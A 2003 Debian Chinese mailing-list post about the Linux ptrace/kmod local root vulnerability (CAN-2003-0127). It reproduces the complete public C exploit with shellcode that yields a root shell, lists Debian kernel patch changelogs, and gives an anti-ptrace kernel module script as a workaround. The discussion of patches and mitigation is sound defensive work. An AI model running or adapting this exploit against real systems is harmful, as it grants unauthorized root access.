Ptrace Vulnerability Allows Gaining of Elevated Privileges under Linux

[Rex Tsai <chihchun@kalug.linux.org.tw>]

Ok, 许多朋友透过 ICQ/Mail 跟我讨论关于 Ptrace Vulnerability Allows Gaining
of Elevated Privileges under Linux，也就是 CAN-2003-0127
<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0127>。由 Andrzej
Szombierski 在 西元2003年03月20日 03:22 首次公开在 BugTraq Mailing List 发布
相关的资讯细节 <http://www.securityfocus.com/archive/1/315635>。许多朋友埋怨
Debian 在这次的事情上居然没有发布 DSA 来说明这件安全危机。

这次的系统安全问题是在于核心中的 ptrace (process trace) system call 的缺陷，
以致于 local user 可以轻易的取得 root 权限。例如透过使用以下的 exploit 可以
取得 root 权限。

*这是 public exploit, 仅供测试, 不得在非个人机器使用*

Sample exploit here (ix86-only):
http://august.v-lo.krakow.pl/~anszom/km3.c
or
http://isec.pl/cliph/isec-ptrace-kmod-exploit.c

Exploit:
----------------------------------------------------------------------
/*
 * Linux kernel ptrace/kmod local root exploit
 *
 *
 *
 * Should work under all current 2.2.x and 2.4.x kernels.
 *
 * I discovered this stupid bug independently on January 25, 2003, that
 * is (almost) two month before it was fixed and published by Red Hat
 * and others.
 *
 * Wojciech Purczynski <cliph@isec.pl>
 *
 * THIS PROGRAM IS FOR EDUCATIONAL PURPOSES *ONLY*
 * IT IS PROVIDED "AS IS" AND WITHOUT ANY WARRANTY
 *
 * (c) 2003 Copyright by iSEC Security Research
 */

#include <grp.h>
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <paths.h>
#include <string.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/param.h>
#include <sys/types.h>
#include <sys/ptrace.h>
#include <sys/socket.h>
#include <linux/user.h>

char cliphcode[] =
 "\x90\x90\xeb\x1f\xb8\xb6\x00\x00"
 "\x00\x5b\x31\xc9\x89\xca\xcd\x80"
 "\xb8\x0f\x00\x00\x00\xb9\xed\x0d"
 "\x00\x00\xcd\x80\x89\xd0\x89\xd3"
 "\x40\xcd\x80\xe8\xdc\xff\xff\xff";

#define CODE_SIZE (sizeof(cliphcode) - 1)

pid_t parent = 1;
pid_t child = 1;
pid_t victim = 1;
volatile int gotchild = 0;

void fatal(char * msg)
{
 perror(msg);
 kill(parent, SIGKILL);
 kill(child, SIGKILL);
 kill(victim, SIGKILL);
}

void putcode(unsigned long * dst)
{
 char buf[MAXPATHLEN + CODE_SIZE];
 unsigned long * src;
 int i, len;

 memcpy(buf, cliphcode, CODE_SIZE);
 len = readlink("/proc/self/exe", buf + CODE_SIZE, MAXPATHLEN - 1);
 if (len == -1)
  fatal("[-] Unable to read /proc/self/exe");

 len += CODE_SIZE + 1;
 buf[len] = '\0';

 src = (unsigned long*) buf;
 for (i = 0; i < len; i += 4)
  if (ptrace(PTRACE_POKETEXT, victim, dst++, *src++) == -1)
   fatal("[-] Unable to write shellcode");
}

void sigchld(int signo)
{
 struct user_regs_struct regs;

 if (gotchild++ == 0)
  return;

 fprintf(stderr, "[+] Signal caught\n");

 if (ptrace(PTRACE_GETREGS, victim, NULL, &regs) == -1)
  fatal("[-] Unable to read registers");

 fprintf(stderr, "[+] Shellcode placed at 0x%08lx\n", regs.eip);

 putcode((unsigned long *)regs.eip);

 fprintf(stderr, "[+] Now wait for suid shell...\n");

 if (ptrace(PTRACE_DETACH, victim, 0, 0) == -1)
  fatal("[-] Unable to detach from victim");

 exit(0);
}

void sigalrm(int signo)
{
 errno = ECANCELED;
 fatal("[-] Fatal error");
}

void do_child(void)
{
 int err;

 child = getpid();
 victim = child + 1;

 signal(SIGCHLD, sigchld);

 do
  err = ptrace(PTRACE_ATTACH, victim, 0, 0);
 while (err == -1 && errno == ESRCH);

 if (err == -1)
  fatal("[-] Unable to attach");

 fprintf(stderr, "[+] Attached to %d\n", victim);
 while (!gotchild) ;
 if (ptrace(PTRACE_SYSCALL, victim, 0, 0) == -1)
  fatal("[-] Unable to setup syscall trace");
 fprintf(stderr, "[+] Waiting for signal\n");

 for(;;);
}

void do_parent(char * progname)
{
 struct stat st;
 int err;
 errno = 0;
 socket(AF_SECURITY, SOCK_STREAM, 1);
 do {
  err = stat(progname, &st);
 } while (err == 0 && (st.st_mode & S_ISUID) != S_ISUID);

 if (err == -1)
  fatal("[-] Unable to stat myself");

 alarm(0);
 system(progname);
}

void prepare(void)
{
 if (geteuid() == 0) {
  initgroups("root", 0);
  setgid(0);
  setuid(0);
  execl(_PATH_BSHELL, _PATH_BSHELL, NULL);
  fatal("[-] Unable to spawn shell");
 }
}

int main(int argc, char ** argv)
{
 prepare();
 signal(SIGALRM, sigalrm);
 alarm(10);

 parent = getpid();
 child = fork();
 victim = child + 1;

 if (child == -1)
  fatal("[-] Unable to fork");

 if (child == 0)
  do_child();
 else
  do_parent(argv[0]);

 return 0;
}
----------------------------------------------------------------------

我弄不清楚为甚么 Debian Security Team 没有发布 DSA 来警告大家该更新系统，
或许是世界不太和平的关系。然而、事实上，Debian Security Team 的确发布两个
了相关的 DSA

[DSA 270-1] New Linux kernel packages (mips + mipsel) fix local root exploit
http://www.debian.org/security/2003/dsa-270
[DSA 276-1] New Linux kernel packages (s390) fix local root exploit
http://www.debian.org/security/2003/dsa-276

Alan Cox 在 Mar 13 改好一份 Linux 2.4.20/Linux 2.4.21pre patch
<http://www.uwsg.iu.edu/hypermail/linux/kernel/0303.2/0226.html>。至于在 Debian
woody 上的更新程式其实从 Mar 18 开始使用 Alan 的 patch 从 x86 版本起都已经逐
渐上传到 woody-proposed-updates，所以有解决方案，只是没有 DSA 而已。

----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00021.html
Date: Tue, 18 Mar 2003 20:39:44 +1100
Changes:
 kernel-source-2.4.20 (2.4.20-3woody.2) stable; urgency=low
 .
   * Fixed ptrace security hole.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00022.html
Date: Wed, 19 Mar 2003 20:41:31 +1100
Changes:
 kernel-source-2.4.20 (2.4.20-3woody.3) stable; urgency=low
 .
   * Made ptrace fix compile on alpha.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00028.html
Date: Tue, 18 Mar 2003 20:49:07 +1100
Changes:
 kernel-source-2.2.25 (2.2.25-1) stable unstable; urgency=low
 .
   * New upstream release.
    . Fixes the ptrace security hole.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00029.html
Date: Tue, 18 Mar 2003 20:56:26 +1100
Changes:
 kernel-image-2.2.25-i386 (2.2.25-1) stable unstable; urgency=low
 .
   * New upstream release.
    . Fixes the ptrace security hole.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00030.html
Date: Tue, 18 Mar 2003 21:30:17 +1100
Changes:
 kernel-image-2.4.20-1-i386 (2.4.20-3woody.2) stable; urgency=low
 .
   * Rebuilt against kernel-source 2.4.20-3woody.2.
    . Fixed ptrace security hole.
    . Changed modules ABI.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00031.html
Date: Tue, 18 Mar 2003 20:58:33 +1100
Changes:
 kernel-image-2.2.25-alpha (2.2.25-1) stable unstable; urgency=low
 .
   * New upstream release.
    . Fixes the ptrace security hole.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00032.html
Date: Thu, 20 Mar 2003 20:20:37 +1100
Changes:
 kernel-image-2.4.20-1-alpha (2.4.20-1woody.3) stable; urgency=low
 .
   * Rebuilt against kernel-source 2.4.20-3woody.3.
    . Fixed ptrace security hole.
    . Changed modules ABI.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00033.html
Date: Thu, 20 Mar 2003 12:46:33 -0500
Changes:
 kernel-image-sparc-2.4 (26.potato.1) stable; urgency=low
 .
   * Compile against newer kernel source for ptrace fix.
   * Added UltraSPARC I HME ethernet patch.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00035.html
Date: Tue, 25 Mar 2003 22:48:35 +0100
Changes:
 kernel-image-2.4.17-s390 (2.4.17-2.woody.2) stable; urgency=high
 .
   * Integrated new kernel-patches from the IBM Developerworks
     website which fix some severe problems (released on
     2002.11.25, 2003.02.20 and 2003.03.17).
   * Integrated a patch by Allan Cox to fix a ptrace related
     security problem (backport from kernel version 2.4.20)
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00037.html
Date: Sun, 23 Mar 2003 22:34:31 +0100
Changes:
 kernel-patch-2.4.17-mips (2.4.17-0.020226.2.woody1) stable-security;
urgency=high
 .
   * ptrace security fix
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200303/msg00038.html
Date: Tue, 18 Mar 2003 14:22:09 +0100
Changes:
 kernel-patch-2.4.19-mips (2.4.19-0.020911.1.woody1) stable-security;
urgency=high
  .
     * fix ptrace security hole
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200304/msg00004.html
Date: Fri, 28 Mar 2003 17:05:23 +0100
Changes:
 kernel-image-2.4.17-s390 (2.4.17-2.woody.2.1) stable-security; urgency=high
 .
   * NMU
   * Use new kernel-patch with a different fix for the ptrace
     security problem, provided by Martin Schwidefsky.
   * drop all non-security fixes relative to 2.4.17-2.woody.1.1.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200304/msg00003.html
Date: Thu, 03 Apr 2003 10:58:12 +0100
Changes:
 kernel-image-2.4.17-s390 (2.4.17-2.woody.2.2) stable-security; urgency=high
 .
   * NMU
   * revert accidental configuration changes
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200304/msg00002.html
Date: Fri, 28 Mar 2003 15:53:03 +0100
Changes:
 kernel-patch-2.4.17-s390 (0.0.20020816-0.woody.1.1) stable-security;
urgency=high
 .
   * NMU
   * Added an s390 specific patch for the ptrace vulnerability,
     provided by Martin Schwidefsky <schwidefsky@de.ibm.com>.
----------------------------------------------------------------------
http://lists.debian.org/debian-changes/2003/debian-changes-200304/msg00007.html
Date: Tue, 14 Jan 2003 12:44:43 +0100
Changes:
 kernel-image-2.4.19-arm (2.4.19-1) stable; urgency=low
 .
   * Initial upload to build the various ARM kernel-images from
     one package, much like it is done for i386.
   * Makefile.diff works around too long argument lists
   * Makefile_scsi.diff adds scsi_error.o and scsi_ioctl.o to export-objs in
     drivers/scsi/Makefile
   * Makefile_scsi_ioctl.patch exports a needed symbol for the netwinder
     images to resolve some undefined references in the scsi modules
   * get_lost_old_nettrom.patch quick and dirty hack so that CATS can boot
   * ptrace.patch fixes the ptrace vulnerability
----------------------------------------------------------------------

各位可以透过这个 apt resource 来更新档案，建议马上更新你的系统
deb ftp://ftp.us.debian.org/debian dists/woody-proposed-updates/

如果你不想更新 kernel，一个 workaround 是装 NPT LKM。(No Ptrace Linux Kernel
Module) 这个 LKM 将让除了 root 以外的用户无法使用 ptrace，因此一般用户将无法
使用 ptrace，因此非 root 之 user 将无法使用 gdb 等工具。

----------------------------------------------------------------------
#!/bin/sh
# MAKE ME EXECUTABLE !!!
#
# root@Hogwarts:/home/sacrine/TEST# chmod +x anti-ptrace
# root@Hogwarts:/home/sacrine/TEST# ./anti-ptrace
# [+] making anti-ptrace.c: OK
# [+] compiling the script: OK
# [+] loading the module : OK
#

echo -n " [+] making anti-ptrace.c: "
cat > anti-ptrace.c <<NETRIC

/*
 * Noodoplossing voor de ptrace race vuln
 * anti-ptrace.c by sacrine
 * netric.org
 */

#define __KERNEL__
#define MODULE
#define LINUX

#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/types.h>
#include <linux/version.h>
#include <linux/slab.h>
#include <linux/sched.h>
#include <linux/fs.h>
#include <linux/ctype.h>
#include <linux/tty.h>
#include <sys/syscall.h>

#include <linux/ptrace.h>

long (*o_ptrace) ( pid_t pid,
   void *addr,
   void *data );

extern void* sys_call_table[];

int anti_ptrace( pid_t pid,
   uid_t uid,
   void *addr,
   void *data )
{
   uid_t o_uid;

   if(current->uid == 0)
     {
 return(o_ptrace(pid,addr,data));
     }

   printk("warning: ptrace(); violation\n"
  "pid=[%i] uid=[%i]\n"
  ,current->pid
  ,current->uid);

   console_print("warning: non-root users are not allowed to use
ptrace();\n");
   return EPERM;
}

int init_module(void)
{
   o_ptrace=sys_call_table[SYS_ptrace];
   sys_call_table[SYS_ptrace]=anti_ptrace;

   printk("anti-ptrace kernel module loaded with pid=[%i]\n",
  current->pid);

   return(0);
}

void cleanup_module(void)
{
   sys_call_table[SYS_ptrace]=o_ptrace;
   printk("anti-ptrace kernel module ended with pid=[%i]\n",
  current->pid);
}

NETRIC
echo "OK";
echo -n " [+] compiling the script: ";
gcc -c anti-ptrace.c -I/lib/modules/$(uname -r)/build/include
echo "OK";
echo -n " [+] loading the module : ";
/sbin/insmod anti-ptrace.o >/dev/null
echo "OK";

# sacrine [Netric Security]
----------------------------------------------------------------------

另外一个 NPT LKM http://www.securiteam.com/tools/5SP082K5GK.html
-- 
-Rex, geek by nature linux by choice

-- 
To UNSUBSCRIBE, email to debian-chinese-big5-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org

-- 
| This message was re-posted from debian-chinese-big5@lists.debian.org
| and converted from big5 to gb2312 by an automatic gateway.